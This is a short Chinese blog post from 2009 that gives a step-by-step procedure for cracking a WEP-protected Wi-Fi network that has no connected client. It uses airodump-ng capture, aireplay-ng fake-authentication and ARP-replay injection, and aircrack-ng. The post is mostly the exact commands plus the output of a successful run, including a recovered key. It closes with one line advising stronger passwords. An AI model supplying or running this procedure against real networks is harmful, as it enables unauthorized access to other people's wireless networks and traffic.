2009年11月1日 星期日

wep無客戶端(1-3號攻擊模式)破解

在沒有client的情況,wep竟也宣告束手就擒。

一,開第一個terminal
1.minidwep
a.找一個想破的wep,查看頻道號,mac

2.iwconfig mon0 channel [CHno]
a.將監控界面mon0設為該AP的頻道

3.airodump-ng -w [filename] -c [CHno] --bssid [AP's mac] mon0
a.傾倒監控界面mon0在頻道CHno上某一AP的資料寫入[filename]-01.cap中

二,開第二個terminal
1.export MAC=[自己網卡的mac]

2.export AP=[AP's mac]

3.aireplay-ng -1 0 -e [essid] -a $AP -h $MAC mon0
a.進行第一號攻擊,0延遲,[essid]為AP名號
b.若成,則顯示:Association successful :-) (AID: 1)

4.aireplay-ng -3 -b $AP -h $MAC -x 1024 mon0
a.採取第三號攻擊。限制為傳送資料每回為1024。
b.這時會將所得資料寫入replay_arp-1102-094924.cap檔。1102表示11月2日,094924則為9點49分24秒。
c.開始不斷地注入資料。

三,開第三個terminal
1.這時觀看第一個terminal,data值會快速遞增,當達約三萬時,可嘗試進行破解。

2.aircrack-ng -x -f 2 [filename]-01.cap
a.[filename]-01是在第一個terminal中,下airodump-ng指令時所指定的檔名。
b.對[filename]-01.cap進行破解。

四,等待
1.此時三個terminal同時在跑,第一個寫資料到[filename]-01.cap中;第二個進行第三號攻擊;第三個則對不斷增長的[filename]-01.cap進行解碼。

2.這次實驗,是到了資料值為五萬時得到了金鑰。顯示如下:
Tested 943472 keys (got 51579 IVs)
KEY FOUND! [ 6D:61:72:67:61:72:65:74:63:68:65..... ]

3.AP使用了十三個英文字 (可能是他的英文名字吧),才會破得這麼快。若串接數字 (如加上生日),可就等久了。所以自己設密碼得小心些才是。

沒有留言:

張貼留言